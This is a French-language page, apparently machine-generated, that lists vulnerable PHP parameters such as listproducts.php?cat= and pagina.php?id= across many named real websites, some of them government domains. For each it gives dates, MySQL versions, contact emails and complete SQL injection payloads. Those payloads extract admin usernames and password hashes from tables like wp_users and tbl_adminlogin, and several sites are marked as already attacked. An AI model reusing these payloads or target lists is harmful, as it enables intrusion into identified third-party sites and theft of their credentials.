item.php et la variable ?itemid= la version la plus en cause est 5.5.32-log. Pour le fichier item.php et la variable ?itemid= le site web www.advancedknowledge.com est vulnerable. Pour le fichier item.php et la variable ?itemid= le site web www.robertwservice.com a differents fichiers possiblement vulnerable. Pour le fichier listproducts.php et la variable ?cat= le site web testphp.vulnweb.com est le plus en cause. Pour le fichier listproducts.php et la variable ?cat= le site web qui corresponds le plus au modele est thebabyshoppe.co.za. Pour le fichier listproducts.php et la variable ?cat= l'hebergement le plus en cause est com.au. Pour le fichier listproducts.php et la variable ?cat= la date la plus en cause est le 03/12/16. Pour le fichier listproducts.php et la variable ?cat= le code le plus en cause est -1+union+select+1,version(),3,4,5,6,database(),8,9,10,user(). Pour le fichier listproducts.php et la variable ?cat= le code qui corresponds le plus au modele est idem. Pour le fichier listproducts.php et la variable ?cat= la version la plus en cause est 5.1.69-0ubuntu0.10.04.1. Pour le fichier listproducts.php et la variable ?cat= le site web testphp.vulnweb.com est deja attaque. Pour le fichier listproducts.php et la variable ?cat= le site web www.modsecurity.org est deja attaque. Pour le fichier pagina.php et la variable ?id= le site web www.parchiromagna.it est le plus en cause. Pour le fichier pagina.php et la variable ?id= le site web qui corresponds le plus au modele est www.iz.agricultura.sp.gov.br. Pour le fichier pagina.php et la variable ?id= l'hebergement le plus en cause est it. Pour le fichier pagina.php et la variable ?id= la date la plus en cause est le 03/12/16. Pour le fichier pagina.php et la variable ?id= la date de publication la plus en cause est le 18/09/15. Pour le fichier pagina.php et la variable ?id= le code le plus en cause est -30+union+select+0,login,pwd+from+tb_usuario. Pour le fichier pagina.php et la variable ?id= la version la plus en cause est 5.5.40-log. Pour le fichier pagina.php et la variable ?id= le site web www.cff.org.br a differents fichiers possiblement vulnerable. Pour le fichier post.php et la variable ?id= le site web battlelog.co est le plus en cause. Pour le fichier post.php et la variable ?id= le site web qui corresponds le plus au modele est www.uplatz.com. Pour le fichier post.php et la variable ?id= l'hebergement le plus en cause est co. Pour le fichier post.php et la variable ?id= la date la plus en cause est le 06/12/16. Pour le fichier post.php et la variable ?id= la date de publication la plus en cause est le 10/10/16. Pour le fichier post.php et la variable ?id= le code le plus en cause est -29+union+select+1,2,3,4,5,concat_ws(0x3a,ID,user_login,user_pass,user_nicename,user_email,user_url,u ser_registered,user_activation_key,user_status,display_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25+from+wp_users--. Pour le fichier post.php et la variable ?id= le mail le plus en cause est kenny@sumagency.com. Pour le fichier sections.php et la variable ?secid= le site web www.katerelos.gr est le plus en cause. Pour le fichier sections.php et la variable ?secid= le site web qui corresponds le plus au modele est gwww.aad.sk. Pour le fichier sections.php et la variable ?secid= l'hebergement le plus en cause est sk. Pour le fichier sections.php et la variable ?secid= la date la plus en cause est le 31/01/17. Pour le fichier sections.php et la variable ?secid= le code le plus en cause est -1+union+select+1,2,3,concat(password,0x3a,password),5,6+from+MidaAdminLogin. Pour le fichier sections.php et la variable ?secid= le code qui corresponds le plus au modele est idem. Pour le fichier showinterview.php et la variable ?id= le site web www.lordsofmetal.nl est le plus en cause. Pour le fichier showinterview.php et la variable ?id= le site web qui corresponds le plus au modele est archive.is. Pour le fichier showinterview.php et la variable ?id= l'hebergement le plus en cause est is. Pour le fichier showinterview.php et la variable ?id= la date la plus en cause est le 11/12/16. Pour le fichier showinterview.php et la variable ?id= la date de publication la plus en cause est le 14/03/06. Pour le fichier showinterview.php et la variable ?id= le code le plus en cause est -9+union+select+concat%28uname,0x3a,pwd%29,2,3+from+adminlogin. Pour le fichier tender_details.php et la variable ?tid= le site web www.edudbc.gov.np est le plus en cause. Pour le fichier tender_details.php et la variable ?tid= le site web qui corresponds le plus au modele est www.cementcorporation.co.in. Pour le fichier tender_details.php et la variable ?tid= l'hebergement le plus en cause est gov.np. Pour le fichier tender_details.php et la variable ?tid= la date la plus en cause est le 31/01/17. Pour le fichier tender_details.php et la variable ?tid= la date de publication la plus en cause est le 06/11/16. Pour le fichier tender_details.php et la variable ?tid= le code le plus en cause est -456+union+select+1,group_concat(user_name,0x3a,pass_word),3,4,5,6,7,8,9,10,11,12,13+from+tbl_adminlo gin--. Pour le fichier tender_details.php et la variable ?tid= le site web chilime.com.np est deja attaque. Pour le fichier tender_details.php et la variable ?tid= le site web www.eproc.seznepal.gov.np est deja attaque. Pour le fichier tender_details.php et la variable ?tid= le site web www.cementcorporation.co.in est deja attaque. Pour le fichier detail.php et la variable ?headline= le site web dayafterindia.com est deja attaque. Pour le fichier exhibitions.php et la variable ?id= le site web www.neworleansphotoalliance.org a differents fichiers possiblement vulnerable. Pour le fichier index.php et la variable ?id= le site web www.univ-paris1.fr est le plus en cause. Pour le fichier index.php et la variable ?id= le site web qui corresponds le plus au modele est www.sfmusicologie.fr. Pour le fichier index.php et la variable ?id= l'hebergement le plus en cause est fr. Pour le fichier index.php et la variable ?id= la date la plus en cause est le 03/12/16. Pour le fichier index.php et la variable ?id= la date de publication la plus en cause est le 07/10/16. Pour le fichier index.php et la variable ?id= le code le plus en cause est -17%20union%20select%201,2,concat(priv,0x3a,nom_utilisateur,0x3a,mot_passe),4,5,6,7,8,9,10+from+utili sateurs--. Pour le fichier index.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier index.php et la variable ?id= la version la plus en cause est 5.0.91-log. Pour le fichier index.php et la variable ?id= le mail le plus en cause est your@email.net. Pour le fichier index.php et la variable ?id= le site web www.icdcprague.org est vulnerable. Pour le fichier index.php et la variable ?id= le site web sallatykka.com est vulnerable. Pour le fichier item.php et la variable ?itemid= le site web www.planetanim.com a differents fichiers possiblement vulnerable. Pour le fichier listproducts.php et la variable ?cat= le site web ewar.in est vulnerable. Pour le fichier article.php et la variable ?articleID= le site web www.baseballprospectus.com est le plus en cause. Pour le fichier article.php et la variable ?articleID= le site web qui corresponds le plus au modele est naszekaszuby.pl. Pour le fichier article.php et la variable ?articleID= l'hebergement le plus en cause est com. Pour le fichier article.php et la variable ?articleID= la date la plus en cause est le 27/04/16. Pour le fichier article.php et la variable ?articleID= la date de publication la plus en cause est le 11/08/16. Pour le fichier article.php et la variable ?articleID= le code le plus en cause est -238+union+select+1,version(),3,4,5,6,7,8,9,10--. Pour le fichier article.php et la variable ?articleID= le code qui corresponds le plus au modele est -1197+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--. Pour le fichier article.php et la variable ?articleID= la version la plus en cause est 5.1.65-cll. Pour le fichier article.php et la variable ?articleID= le site web www.geneberg.com est deja attaque. Pour le fichier article.php et la variable ?articleID= le site web www.planetanim.com a differents fichiers possiblement vulnerable. Pour le fichier article.php et la variable ?articleID= le site web www.robertwservice.com a differents fichiers possiblement vulnerable. Pour le fichier view.php et la variable ?id= le site web earthobservatory.nasa.gov a differents fichiers possiblement vulnerable. Pour le fichier view.php et la variable ?id= le site web elearning.rcgp.org.uk a differents fichiers possiblement vulnerable. Pour le fichier showInterview.php et la variable ?id= le site web archive.is a differents fichiers possiblement vulnerable. Pour le fichier article.php et la variable ?sid= le site web www.ocvidh.org est le plus en cause. Pour le fichier article.php et la variable ?sid= le site web qui corresponds le plus au modele est www.sudinondation.com. Pour le fichier article.php et la variable ?sid= l'hebergement le plus en cause est com. Pour le fichier article.php et la variable ?sid= la date la plus en cause est le 11/12/16. Pour le fichier article.php et la variable ?sid= la date de publication la plus en cause est le 21/04/16. Pour le fichier article.php et la variable ?sid= le code le plus en cause est 19+and+1%3D0+union+select+all+1%2Cgroup_concat(UserName%2C0x3a%2CPassword%2C0x3a%2CStatus)%2C3%2C4%2 C5%2C6+from+MidaAdminLogin. Pour le fichier article.php et la variable ?sid= le code qui corresponds le plus au modele est 19+and+1=0+union+select+all+1,group_concat(UserName,0x3a,Password,0x3a,Status),3,4,5,6+from+MidaAdmi nLogin--. Pour le fichier shopping_detail.php et la variable ?id= le site web delhidiary.in est le plus en cause. Pour le fichier shopping_detail.php et la variable ?id= le site web qui corresponds le plus au modele est www.piazza.ch. Pour le fichier shopping_detail.php et la variable ?id= l'hebergement le plus en cause est com.tw. Pour le fichier shopping_detail.php et la variable ?id= la date la plus en cause est le 11/12/16. Pour le fichier shopping_detail.php et la variable ?id= la date de publication la plus en cause est le 07/03/13. Pour le fichier shopping_detail.php et la variable ?id= le code le plus en cause est -1337%20%20UNION%20SELECT%201,2,3,group_concat(fld_login,0x3a,fld_password,0x3a),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20FROM%20tbl_adminLogin--. Pour le fichier shopping_detail.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier calendar_detail.php et la variable ?id= le site web www.anthonyssteakhouse.com est le plus en cause. Pour le fichier calendar_detail.php et la variable ?id= le site web qui corresponds le plus au modele est www.clubatcorazon.com. Pour le fichier calendar_detail.php et la variable ?id= l'hebergement le plus en cause est th. Pour le fichier calendar_detail.php et la variable ?id= la date la plus en cause est le 11/12/16. Pour le fichier calendar_detail.php et la variable ?id= la date de publication la plus en cause est le 18/11/15. Pour le fichier calendar_detail.php et la variable ?id= le code le plus en cause est 10+union+all+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(ruscombe_wp_1.wp_users)wher e(0x00)in(@x:=concat(@x,0x3c62723e,concat_ws(0x3b,ID,user_login,user_pass,user_nicename,user_email,u ser_url,user_registered,user_activation_key,user_status,display_name)))))x),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22. Pour le fichier calendar_detail.php et la variable ?id= le code qui corresponds le plus au modele est 10+union+all+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22. Pour le fichier calendar_detail.php et la variable ?id= la version la plus en cause est 5.0.91-log. Pour le fichier calendar_detail.php et la variable ?id= le mail le plus en cause est webmaster@ruscombe.org. Pour le fichier calendar_detail.php et la variable ?id= le site web www.ruscombe.org est deja attaque. Pour le fichier calendar_detail.php et la variable ?id= le site web www.ustaekwondoacademy.com a differents fichiers possiblement vulnerable. Pour le fichier schedule.php et la variable ?id= le site web www.norfolkadmirals.com est vulnerable. Pour le fichier schedule.php et la variable ?id= le site web www.fomntt.com est le plus en cause. Pour le fichier schedule.php et la variable ?id= le site web qui corresponds le plus au modele est www.sohl.ca. Pour le fichier schedule.php et la variable ?id= l'hebergement le plus en cause est us. Pour le fichier schedule.php et la variable ?id= la date la plus en cause est le 28/07/15. Pour le fichier schedule.php et la variable ?id= la date de publication la plus en cause est le 05/02/15. Pour le fichier schedule.php et la variable ?id= le code le plus en cause est -9%27+union+select+group_concat(ID,0x3a,user_login,0x3a,user_pass)+from+spirityoga.wp_bpcq1y_users+--+. Pour le fichier schedule.php et la variable ?id= la version la plus en cause est 5.1.56-log. Pour le fichier schedule.php et la variable ?id= le site web www.regattaworks.com a differents fichiers possiblement vulnerable.

        Commentaire

        Chargement...
        X